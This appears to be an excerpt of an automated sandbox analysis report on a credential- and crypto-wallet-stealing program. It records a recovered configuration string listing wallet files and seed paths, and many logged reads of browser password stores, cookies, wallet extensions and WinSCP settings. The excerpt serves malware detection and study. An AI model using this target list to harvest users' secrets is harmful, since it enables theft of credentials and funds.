Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Exodus
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: 5876.exe, 00000007.00000002.2152415430.00000000007F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: 5876.exe, 00000007.00000003.1772581460.000000000085D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore
Source: katDDA4.tmp, 0000000C.00000002.2532896243.0000000000572000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: nnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|

Opens network shares

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: \\config\			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: \\config\			Jump to behavior

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\katDDA4.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5876.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
